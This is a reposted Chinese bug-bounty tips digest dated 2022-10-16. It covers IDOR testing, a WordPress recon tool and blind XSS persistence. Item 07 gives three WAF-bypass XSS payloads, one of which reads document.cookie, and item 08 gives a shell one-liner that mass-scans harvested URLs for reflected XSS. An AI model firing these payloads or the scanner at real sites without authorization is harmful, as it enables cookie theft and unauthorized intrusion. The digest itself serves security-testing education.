Bug Bounty Tips(2022-10-16)

渗透技巧 2年前 (2022) admin
641 0 0

点击蓝字 关注不迷路

01

When testing IDOR on a request that is supposed to alter something (PUT/DELETE/PATCH), receiving 403 Forbidden Access in response does not necessarily mean the endpoint is not vulnerable to IDOR. Always check the UI as well.  

02

WPRecon, is a tool for the recognition of vulnerabilities and blackbox information for wordpress.

https://github.com/AngraTeam/wprecon  

03

Hi Hunters! Here’s V1 0f My Recon Methodology , Enjoy

Bug Bounty Tips(2022-10-16)

04

Perhaps the reason you are not finding vulns/bugs is either because your environment is not setup correctly or your methodology requires improvements. Here are a number of  to help you with that 

https://www.gnucitizen.org/blog/bug-bounty-tips/

05

Web application surface testing

Bug Bounty Tips(2022-10-16)


06

File Upload Cheat Sheet

Bug Bounty Tips(2022-10-16)

07

Sunday Funday waf bypass x3, happy hacking 🙂

"onx+%00+onpointerenter%3dalert(domain)+x"
%2sscript%2ualert()%2s/script%2u
“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;

08

一行代码组成的XSS扫描器(适合无WAF场景)【单论反射XSS,XRAY可封神】

echo url | subfinder -silent | waybackurls | grep "=" | grep -Ev ".(jpeg|jpg|png|svg|gif|ico|js|css|txt|pdf|woff|woff2|eot|ttf|tif|tiff)" | sed -e 's/=[^?|&amp;]*/=/g' -e 's/=/=xssspayload/g' | sort -u | httpx -silent -probe -ms "xsspayload" 

09

Tip: web app is using REST API? Look for information disclosure.

Bug Bounty Tips(2022-10-16)


10

I inserted a blind xss payload a few months ago and it was triggered just a few days ago XSS via product name field triggered when the admin website wanted to delete it.


一句话翻译:盲打的XSS,永不放弃!


计划修改更新频率:周一到周五。周末的可能会直接发群里,不单独发文。








原文始发于微信公众号(Bug Bounty Tips):Bug Bounty Tips(2022-10-16)

版权声明:admin 发表于 2022年10月17日 上午8:11。
转载请注明:Bug Bounty Tips(2022-10-16) | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...